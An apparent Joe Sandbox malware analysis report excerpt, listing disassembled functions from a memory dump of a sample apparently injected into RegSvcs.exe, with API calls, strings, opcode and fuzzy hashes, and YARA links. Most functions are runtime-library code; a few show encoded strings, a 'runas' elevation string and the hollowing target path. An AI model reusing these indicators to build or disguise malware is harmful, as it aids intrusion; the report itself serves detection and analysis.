                                                      • Opcode ID: c7246ac7067cf59ec295879c086e16f99b4a876b3f110276431064805dc232d6
                                                      • Instruction ID: a47bd369100c9176b0a939c2411aa7f03cab870ae8b14c2b194c09bae2fe4339
                                                      • Opcode Fuzzy Hash: c7246ac7067cf59ec295879c086e16f99b4a876b3f110276431064805dc232d6
                                                      • Instruction Fuzzy Hash: 6341C6B1A002049FC704DF69D841BAEBBB8EF85324F14852FF914A7681D778A944CBA9
                                                      Function 0042C7F0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 120COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _ValidateLocalCookies.LIBCMT ref: 0042C827
                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 0042C82F
                                                      • _ValidateLocalCookies.LIBCMT ref: 0042C8B8
                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 0042C8E3
                                                      • _ValidateLocalCookies.LIBCMT ref: 0042C938
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                      • String ID: csm$p"B
                                                      • API String ID: 1170836740-3916959777
                                                      • Opcode ID: 8fc70471db4ea1efecf445cbbdb9bf6419abdfff264b22be6b20800d073d357e
                                                      • Instruction ID: 4e5a3472cbb73ffd0aca50f09b4d830986b0721f80597bc85706939221a57aaf
                                                      • Opcode Fuzzy Hash: 8fc70471db4ea1efecf445cbbdb9bf6419abdfff264b22be6b20800d073d357e
                                                      • Instruction Fuzzy Hash: 2641D270F002299BCF00EF69D880A9EBBB4AF45318F54805BE8149B352D7799A45CBD9
                                                      Function 00422770 Relevance: 12.3, APIs: 8, Instructions: 343COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Mtx_unlock$Rethrow_future_exceptionstd::_$Cnd_broadcast
                                                      • String ID:
                                                      • API String ID: 3990724213-0
                                                      • Opcode ID: 85742f03c660c208dee2b57a15d4ef0c322d618bf35b1c47521d8160b5039e98
                                                      • Instruction ID: b2de0f54b7f0b1db96bededc91ed6a47dca4f3ef9a7f70afa0eb513aef62248e
                                                      • Opcode Fuzzy Hash: 85742f03c660c208dee2b57a15d4ef0c322d618bf35b1c47521d8160b5039e98
                                                      • Instruction Fuzzy Hash: 37B124B0F00215ABCB20DF65E945BAFBBB4BF05304F40466FE81697782DB78A944CB95
                                                      Function 00404910 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 64COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 0040499F
                                                        • Part of subcall function 0042B056: RaiseException.KERNEL32(E06D7363,00000001,00000003,004025DC,00420D37,8B18EC83,?,004025DC,?,004644CC), ref: 0042B0B6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExceptionRaise___std_exception_copy
                                                      • String ID: 0*@$0*@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$$@
                                                      • API String ID: 3109751735-1927355542
                                                      • Opcode ID: c3c96513ea1c091b501e7a9c2d125e3e8da586a6527bd220984c3c02bfac6729
                                                      • Instruction ID: 7e9ae3a60d3a75930b960a24edae648050a2e642947a8b52df82228574fc3840
                                                      • Opcode Fuzzy Hash: c3c96513ea1c091b501e7a9c2d125e3e8da586a6527bd220984c3c02bfac6729
                                                      • Instruction Fuzzy Hash: F111D2F26003045FC710DB69D842B97B3E8EB91311F14C53BF95597682E778A914CB99
                                                      Function 0041AD80 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 328COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0040A470: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,A99F1BC9,00000000,?), ref: 0040A4BA
                                                      • GetFileAttributesA.KERNEL32(?,?,00000000,00000000,00467494,0000000E,A99F1BC9,00000000,00000000), ref: 0041AE2D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AttributesFileFolderPath
                                                      • String ID: .$246122658369$Xv==$ZOt=$ZS7n
                                                      • API String ID: 1512852658-1015348533
                                                      • Opcode ID: fdb3df21943d2b92dec2bfbe4731875cc7bcf61a5e05d3aa3db95cc8753f5498
                                                      • Instruction ID: d49b27143f0ac30be76dc25b28aca04d499759bec3868825f72063322344771b
                                                      • Opcode Fuzzy Hash: fdb3df21943d2b92dec2bfbe4731875cc7bcf61a5e05d3aa3db95cc8753f5498
                                                      • Instruction Fuzzy Hash: 6FE1B370A0428CDFEF14DFA8C9497DDBFB5EF45308F508099D4052B282D7795A88CB96
                                                      Function 00435970 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 255COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00436DD0: GetLastError.KERNEL32(00000000,00000000,?,00437BB7,?,00000000,00000000,?,00438071,00000000,00000000,00000000,00000000,8B18EC83,00464158,00000010), ref: 00436DD5
                                                        • Part of subcall function 00436DD0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00438071,00000000,00000000,00000000,00000000,8B18EC83,00464158,00000010,00431112,00000000,00000000,00000000), ref: 00436E73
                                                      • _free.LIBCMT ref: 00435C5B
                                                      • _free.LIBCMT ref: 00435C74
                                                      • _free.LIBCMT ref: 00435CB2
                                                      • _free.LIBCMT ref: 00435CBB
                                                      • _free.LIBCMT ref: 00435CC7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$ErrorLast
                                                      • String ID: p"B
                                                      • API String ID: 3291180501-2496714718
                                                      • Opcode ID: 047c4d0e8c3f23ce859b6f403d1d8baea94e63bc5d936f67046a2bf795d5cc95
                                                      • Instruction ID: 5f255ddc1cec56d3be95aa608c7f25b86e09919c682632e10f6da53d22e0fa5f
                                                      • Opcode Fuzzy Hash: 047c4d0e8c3f23ce859b6f403d1d8baea94e63bc5d936f67046a2bf795d5cc95
                                                      • Instruction Fuzzy Hash: 72B15D759017199FDB24DF18C884AAEB3B4FF48318F5055AEE849A7351E734AE90CF88
                                                      Function 00412330 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 169COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: list too long
                                                      • API String ID: 0-1124181908
                                                      • Opcode ID: fbd60de6cac6b519612e2e4e758915f44dd8b7291b7de539fbedf4aa3ec12349
                                                      • Instruction ID: f6f707817a769f5d2e5db3523ab0ef80ea76e3c099da94bd95e3365d9b57aad9
                                                      • Opcode Fuzzy Hash: fbd60de6cac6b519612e2e4e758915f44dd8b7291b7de539fbedf4aa3ec12349
                                                      • Instruction Fuzzy Hash: AF5193B0E047189BDB10DF64DD45B9AF7B4EF04314F1041AAE81897391EB74AA90CB9A
                                                      Function 00438685 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: api-ms-$ext-ms-
                                                      • API String ID: 0-537541572
                                                      • Opcode ID: fbad2296b56793bad923ff4e577820ce5443bc16a636efc659a3e071fb002eef
                                                      • Instruction ID: 43d193dd692b5fed0b8276f4a6d626e1ca0c4abf57654fbb0f991640ef0a5974
                                                      • Opcode Fuzzy Hash: fbad2296b56793bad923ff4e577820ce5443bc16a636efc659a3e071fb002eef
                                                      • Instruction Fuzzy Hash: 3B210571A01311ABCB224A248C81B1FB7699B097A0F35217BFD15A73A1DF78ED0186E9
                                                      Function 004413E6 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00441132: _free.LIBCMT ref: 00441157
                                                      • _free.LIBCMT ref: 00441434
                                                        • Part of subcall function 004381B6: HeapFree.KERNEL32(00000000,00000000,?,0044115C,?,00000000,?,8B18EC83,?,004413FF,?,00000007,?,?,004418A4,?), ref: 004381CC
                                                        • Part of subcall function 004381B6: GetLastError.KERNEL32(?,?,0044115C,?,00000000,?,8B18EC83,?,004413FF,?,00000007,?,?,004418A4,?,?), ref: 004381DE
                                                      • _free.LIBCMT ref: 0044143F
                                                      • _free.LIBCMT ref: 0044144A
                                                      • _free.LIBCMT ref: 0044149E
                                                      • _free.LIBCMT ref: 004414A9
                                                      • _free.LIBCMT ref: 004414B4
                                                      • _free.LIBCMT ref: 004414BF
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: 8e077332dbe01b7341d50a84b951b88c6f42d95a84fc469bf2f7f0e4c6a3109e
                                                      • Instruction ID: 886a80fc3137415c37bdf28131146e9aae49e82566c9a09544b7ab4caa587314
                                                      • Opcode Fuzzy Hash: 8e077332dbe01b7341d50a84b951b88c6f42d95a84fc469bf2f7f0e4c6a3109e
                                                      • Instruction Fuzzy Hash: 5E116D31981B08AAF931FBB2CC07FCBB7AD5F48704F444C1EB2DA66062DF28B5458654
                                                      Function 0042DEA2 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 30libraryloaderCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,0042DE97,?,?,0042DE5F,00000000,00000000,?), ref: 0042DEB7
                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0042DECA
                                                      • FreeLibrary.KERNEL32(00000000,?,?,0042DE97,?,?,0042DE5F,00000000,00000000,?), ref: 0042DEED
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                      • String ID: CorExitProcess$mscoree.dll$p"B
                                                      • API String ID: 4061214504-3902271996
                                                      • Opcode ID: 6158b668f3bb4c84643ddf8142b9814040938c1bbc68bcb4acb311b105c7f346
                                                      • Instruction ID: a9ec589247606b390a5f02988fb9bc451a4f7732a75776b91ac14855cb504494
                                                      • Opcode Fuzzy Hash: 6158b668f3bb4c84643ddf8142b9814040938c1bbc68bcb4acb311b105c7f346
                                                      • Instruction Fuzzy Hash: CEF01231A40619FBDB119F50ED09B9F7A68EF04757F5100A1F801A55B1CB78DF04DA98
                                                      Function 0043776F Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetConsoleOutputCP.KERNEL32(?,00000000,?), ref: 004377B7
                                                      • __fassign.LIBCMT ref: 0043799C
                                                      • __fassign.LIBCMT ref: 004379B9
                                                      • WriteFile.KERNEL32(?,8B18EC83,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00437A01
                                                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00437A41
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00437AE9
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                      • String ID:
                                                      • API String ID: 1735259414-0
                                                      • Opcode ID: f5d774a95f8939efc2c3250f67d62b39c902261e0d8ed70c96d01c4d2ad4e67a
                                                      • Instruction ID: d3eb400247b7122599ed37ba73980ba6afeee7d51223a857856fc8678a170c6a
                                                      • Opcode Fuzzy Hash: f5d774a95f8939efc2c3250f67d62b39c902261e0d8ed70c96d01c4d2ad4e67a
                                                      • Instruction Fuzzy Hash: 2CC19EB1D042589FCB24CFE8C8809EDBBB9AF0D314F28516AE895F7351E6349E42CB54
                                                      Function 004297D6 Relevance: 9.2, APIs: 6, Instructions: 175COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 0042981F
                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 0042988A
                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004298A7
                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004298E6
                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00429945
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00429968
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ByteCharMultiStringWide
                                                      • String ID:
                                                      • API String ID: 2829165498-0
                                                      • Opcode ID: ad1749bf2f22c090a898cbc540a76858cd01df6ae96a4525085d5509d826719c
                                                      • Instruction ID: b60aeca65cb2d43d0477f5f63b21d2cb44b5fac5a9fd3b7932356db598b2227b
                                                      • Opcode Fuzzy Hash: ad1749bf2f22c090a898cbc540a76858cd01df6ae96a4525085d5509d826719c
                                                      • Instruction Fuzzy Hash: FB51C1B2A10226ABDF209F61EC41FAF7BA9EF44760F54446EF915E6250D738CC50CB58
                                                      Function 00424780 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 004247B5
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 004247D7
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 004247F7
                                                      • __Getctype.LIBCPMT ref: 0042488D
                                                      • std::_Facet_Register.LIBCPMT ref: 004248AC
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 004248C4
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                                      • String ID:
                                                      • API String ID: 1102183713-0
                                                      • Opcode ID: 52cff7bc5db1e7eed9988df49cea48733d3ece94488ff8f5328eaa2b4ba21b0b
                                                      • Instruction ID: d632894b5bfb4559188bf89a069972c36c1871a2db6547f42851e2d8b4f1c5da
                                                      • Opcode Fuzzy Hash: 52cff7bc5db1e7eed9988df49cea48733d3ece94488ff8f5328eaa2b4ba21b0b
                                                      • Instruction Fuzzy Hash: AD41EF75A002648BCB11EF54E840AAEB7B4FF94714F50416EE805AB382EB78AD45CB99
                                                      Function 004089E0 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 322sleepthreadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Sleep.KERNEL32(00000064,A99F1BC9,?,00000000,004490FD,000000FF), ref: 00408A1C
                                                      • __Init_thread_footer.LIBCMT ref: 00408AB6
                                                        • Part of subcall function 00429A98: EnterCriticalSection.KERNEL32(00468FA8,74DF0F00,?,00408ABB,0046CDC0,00450100), ref: 00429AA2
                                                        • Part of subcall function 00429A98: LeaveCriticalSection.KERNEL32(00468FA8,?,00408ABB,0046CDC0,00450100), ref: 00429AD5
                                                        • Part of subcall function 00429A98: WakeAllConditionVariable.KERNEL32(?,0046CDC0,00450100), ref: 00429B4C
                                                      • CreateThread.KERNEL32 ref: 00408B1B
                                                      • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00408B26
                                                        • Part of subcall function 00429AE2: EnterCriticalSection.KERNEL32(00468FA8,00000000,74DF0F00,?,00408A41,0046CDC0), ref: 00429AED
                                                        • Part of subcall function 00429AE2: LeaveCriticalSection.KERNEL32(00468FA8,?,00408A41,0046CDC0), ref: 00429B2A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeaveSleep$ConditionCreateInit_thread_footerThreadVariableWake
                                                      • String ID: runas
                                                      • API String ID: 4065365256-4000483414
                                                      • Opcode ID: 3aea8bf43da370a6acae855602199328b895fed59e23fe529f744aef24482ef8
                                                      • Instruction ID: 865e35d4280a53e7c8067a53bba9ea2e03c7990083b84b3d3742210204622c10
                                                      • Opcode Fuzzy Hash: 3aea8bf43da370a6acae855602199328b895fed59e23fe529f744aef24482ef8
                                                      • Instruction Fuzzy Hash: DDB15A71600248AFEB04DF68DD85B9E7B75EF45304F50822EF851A73C2DB7DA9808B5A
                                                      Function 0042C9B4 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLastError.KERNEL32(?,0044BDDD,0042C9AB,0042B044,00427D59,A99F1BC9,?,?,?,00000000,0044C997,000000FF,?,00402576,?,?), ref: 0042C9C2
                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0042C9D0
                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0042C9E9
                                                      • SetLastError.KERNEL32(00000000,?,00000000,0044C997,000000FF,?,00402576,?,?,0000000F,00403BA5,00000000,0000000F,00000000,0044C330,000000FF), ref: 0042CA3B
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLastValue___vcrt_
                                                      • String ID:
                                                      • API String ID: 3852720340-0
                                                      • Opcode ID: 8273a38f977b3e12df4fac2eca5c926ee98e8702f1ffeeb5d9dbf3f6337985af
                                                      • Instruction ID: 423268e3fcf0bbfaeba5710afc168753fc148499e709c15bea0b3099132cdb00
                                                      • Opcode Fuzzy Hash: 8273a38f977b3e12df4fac2eca5c926ee98e8702f1ffeeb5d9dbf3f6337985af
                                                      • Instruction Fuzzy Hash: 6C0128363083351EA61467757CD5AAF2B44EB1277A771033FF011911E3FE994C01968D
                                                      Function 00402810 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 207COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 004029A6
                                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 00402A40
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ___std_exception_copy___std_exception_destroy
                                                      • String ID: 0*@$$@$$@
                                                      • API String ID: 2970364248-3500887044
                                                      • Opcode ID: e0d76f7f1357b8cddb95282f00b9b5ba105996591d93a4e49f37bc0c9b5f6ad6
                                                      • Instruction ID: 820bfb5d0948b46823d6e7e9d1052f852ad194706c0116c211f4a0b62e008abb
                                                      • Opcode Fuzzy Hash: e0d76f7f1357b8cddb95282f00b9b5ba105996591d93a4e49f37bc0c9b5f6ad6
                                                      • Instruction Fuzzy Hash: 5871B371E002189BDB04DF98D985BDEFBB4EF49314F54812EE805B7381D778A944CBA9
                                                      Function 0042CACB Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 168COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AdjustPointer
                                                      • String ID: p"B
                                                      • API String ID: 1740715915-2496714718
                                                      • Opcode ID: 4992c701d4ed34f197b48a59c39ab97e74287786860dfefabf8f34b56af9a27f
                                                      • Instruction ID: 62adf7ccfab7a2f74c25f6541a023d20e41f3bf5b9be7aa2ab2e51e406227fab
                                                      • Opcode Fuzzy Hash: 4992c701d4ed34f197b48a59c39ab97e74287786860dfefabf8f34b56af9a27f
                                                      • Instruction Fuzzy Hash: D451E272704626AFDB248F16F982B6E77A4EF00310F98452FE80997291E739ED41C799
                                                      Function 0043F647 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, xrefs: 0043F64C
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                      • API String ID: 0-4009286469
                                                      • Opcode ID: f3f6e8b00c08d785b012517290d9b860eb75ca72ab76e1cdb08d9eba7d0af0dd
                                                      • Instruction ID: 7fadd8b23f160e4d98abde648a5fd7ec5487db59e45a73bfd218ce1104749a2c
                                                      • Opcode Fuzzy Hash: f3f6e8b00c08d785b012517290d9b860eb75ca72ab76e1cdb08d9eba7d0af0dd
                                                      • Instruction Fuzzy Hash: B321C571A04206BFAB206FB68C81D6B776DEF1C368F10553AF915D62A1D738DC0587A8
                                                      Function 00428068 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00427FC9: GetModuleHandleExW.KERNEL32(00000002,00000000,00000000,?,?,0042801B,00000014,?,0042805C,00000014,?,00402D32,00000000,00000014,00000000,A99F1BC9), ref: 00427FD5
                                                      • __Mtx_unlock.LIBCPMT ref: 004280AE
                                                      • FreeLibraryWhenCallbackReturns.KERNEL32(?,00000000,A99F1BC9,?,?,?,004488A0,000000FF), ref: 004280D6
                                                      • __Mtx_unlock.LIBCPMT ref: 00428111
                                                      • __Cnd_broadcast.LIBCPMT ref: 00428122
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Mtx_unlock$CallbackCnd_broadcastFreeHandleLibraryModuleReturnsWhen
                                                      • String ID: p"B
                                                      • API String ID: 420990631-2496714718
                                                      • Opcode ID: a46daa44ab08bb0acbbfd87b8131fcb2a0238a40864e4425a852c81890478a36
                                                      • Instruction ID: 0335d5a65dad443a8bf5d061db30fce2cabb06bd8cf0dc6411f7bf21c22857b7
                                                      • Opcode Fuzzy Hash: a46daa44ab08bb0acbbfd87b8131fcb2a0238a40864e4425a852c81890478a36
                                                      • Instruction Fuzzy Hash: F2118472A44620ABCA11BB62BD01B1F77A8EF45B24B51452FF80193692DE7DD801C65E
                                                      Function 0042DA07 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • FreeLibrary.KERNEL32(00000000,?,?,0042DAC8,?,?,00000000,?,?,0042DB7A,00000002,FlsGetValue,004533D8,004533E0,?), ref: 0042DA97
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeLibrary
                                                      • String ID: api-ms-
                                                      • API String ID: 3664257935-2084034818
                                                      • Opcode ID: 8ecd1732025e4b822771f99e5b351481859bdf931172bc3ce1fff5cbab47e006
                                                      • Instruction ID: 0c7f054a289f1843fa228d4c31bc69c26d917de5b477b20cc0227bd62257e2fc
                                                      • Opcode Fuzzy Hash: 8ecd1732025e4b822771f99e5b351481859bdf931172bc3ce1fff5cbab47e006
                                                      • Instruction Fuzzy Hash: 3211C131F49331ABDF228B68AC00F5E3394AB01761F5102A2FD05E7290D678ED0086DD
                                                      Function 00429B6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SleepConditionVariableCS.KERNEL32(?,00429B07,00000064,?,00408A41,0046CDC0), ref: 00429B8D
                                                      • LeaveCriticalSection.KERNEL32(00468FA8,0046CDC0,?,00429B07,00000064,?,00408A41,0046CDC0), ref: 00429B97
                                                      • WaitForSingleObjectEx.KERNEL32(0046CDC0,00000000,?,00429B07,00000064,?,00408A41,0046CDC0), ref: 00429BA8
                                                      • EnterCriticalSection.KERNEL32(00468FA8,?,00429B07,00000064,?,00408A41,0046CDC0), ref: 00429BAF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                      • String ID: p"B
                                                      • API String ID: 3269011525-2496714718
                                                      • Opcode ID: d550c03ad5bdf8e447039ab870f92c002831c9c91170344384543d3b93d78f97
                                                      • Instruction ID: 2859dc784c9ed03da2d10222a7a3d5f9363b99f8d3e55de473af622b7c7d772c
                                                      • Opcode Fuzzy Hash: d550c03ad5bdf8e447039ab870f92c002831c9c91170344384543d3b93d78f97
                                                      • Instruction Fuzzy Hash: 55E01235681624EBCB151B50FC09B8D3F16AF08763B104176F90967171DFE55D109BDE
                                                      Function 004354E5 Relevance: 7.7, APIs: 5, Instructions: 186COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 004383E5: HeapAlloc.KERNEL32(00000000,00420D37,?,?,00429DCF,00420D37,?,004233CE,8B18EC84,74DF0F00), ref: 00438417
                                                      • _free.LIBCMT ref: 004355F4
                                                      • _free.LIBCMT ref: 0043560B
                                                      • _free.LIBCMT ref: 00435628
                                                      • _free.LIBCMT ref: 00435643
                                                      • _free.LIBCMT ref: 0043565A
                                                      Memory Dump Source
